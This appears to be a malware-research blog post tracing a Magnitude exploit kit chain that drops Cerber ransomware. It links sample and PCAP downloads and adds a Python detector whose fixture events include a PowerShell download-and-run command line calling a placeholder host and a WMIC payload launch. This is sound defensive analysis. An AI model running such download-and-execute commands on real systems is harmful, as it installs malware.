- Article from RSA; although it is a few months old and misses some newer aspects of Magnitude, the fundamentals have not changed.
- A few previous Magnitude EK posts from me.
Downloads (in password-protected zip)
- 28-June-Magnitude-Cerber-PCAP – PCAP of Magnitude and Cerber
- 28-June-2017-Cerber – Cerber (a.exe – efe238b3d28c819b27abe668d1188d7534101bcf9a1cfef0c7d56e33b00b8424)
- 28-June-Magnitude-Cerber-CSV – CSV of the traffic with resolved IP addresses.
Details of infection chain:
At some point I hope to take a deep dive into Magnitude EK, mostly focusing on deobfuscation. The first gate, for example, uses the browser's “window.screen” object to generate the next URL, which is quite interesting.
Although not shown in the main picture, a new trend for Magnitude is a double landing page, which causes duplicate traffic.
For now here is a list of processes that were executed:
You can see the scriptlet is run, which drops 3 payloads, all of which fail. I’m not sure why they fail, but it’s possible that, as the Flash request is one of the very first requests in the actual landing page, Magnitude has already decided how to drop the payload and so these fail. I will try it one day without Flash.
A PowerShell command is run to download a file called “b.exe”, and finally WMIC is used to run the payload “a.exe”.
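As an added defensive example (not from the original post), here is a small Python detector that runs over constructed process-creation events and flags the pairing seen in this chain: a browser-rooted PowerShell download followed by a WMIC “process call create” under the same browser. The event layout, the `scripthost.exe` placeholder for the scriptlet host and the sample command lines are assumptions, not the real logs.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I)
WMIC_CREATE_RE = re.compile(r"process\s+call\s+create", re.I)

def browser_ancestor(pid, by_pid):
    """Walk up the parent chain; return the pid of the first browser image, or None."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        if ev.image.lower() in BROWSERS:
            return ev.pid
        pid = ev.ppid
    return None

def find_download_then_wmic(events):
    """Return (browser_pid, powershell_pid, wmic_pid) for each PowerShell download
    and WMIC 'process call create' that descend from the same browser process."""
    by_pid = {e.pid: e for e in events}
    downloads = [e for e in events if e.image.lower() == "powershell.exe" and DOWNLOAD_RE.search(e.cmdline)]
    creates = [e for e in events if e.image.lower() == "wmic.exe" and WMIC_CREATE_RE.search(e.cmdline)]
    hits = []
    for ps in downloads:
        root = browser_ancestor(ps.ppid, by_pid)
        if root is None:
            continue  # admin PowerShell with no browser in its lineage is not this chain
        for wm in creates:
            if browser_ancestor(wm.ppid, by_pid) == root:
                hits.append((root, ps.pid, wm.pid))
    return hits

# Constructed sample events modelled on the chain above; scripthost.exe is a placeholder host.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(1200, 400, "iexplore.exe", "iexplore.exe"),
    ProcEvent(1300, 1200, "scripthost.exe", "scripthost.exe landing.sct"),
    ProcEvent(1400, 1300, "powershell.exe", r"powershell.exe -c (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/b.exe', 'C:\Users\Public\b.exe')"),
    ProcEvent(1500, 1300, "wmic.exe", r"wmic process call create C:\Users\Public\a.exe"),
    ProcEvent(2000, 400, "powershell.exe", "powershell.exe -c Invoke-WebRequest http://intranet.invalid/tool.zip"),
    ProcEvent(2100, 400, "wmic.exe", "wmic os get caption"),
]

if __name__ == "__main__":
    for root, ps, wm in find_download_then_wmic(SAMPLE_EVENTS):
        print(f"browser pid {root}: PowerShell {ps} downloaded a file, WMIC {wm} launched a process")
```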
The payload is of course Cerber Ransomware. This version calls itself “CBRB”.
When I submitted it to VT it had relatively few detections, and none referred to it directly as Cerber, though some vendors may call it other things.
Detection ratio: 13 / 61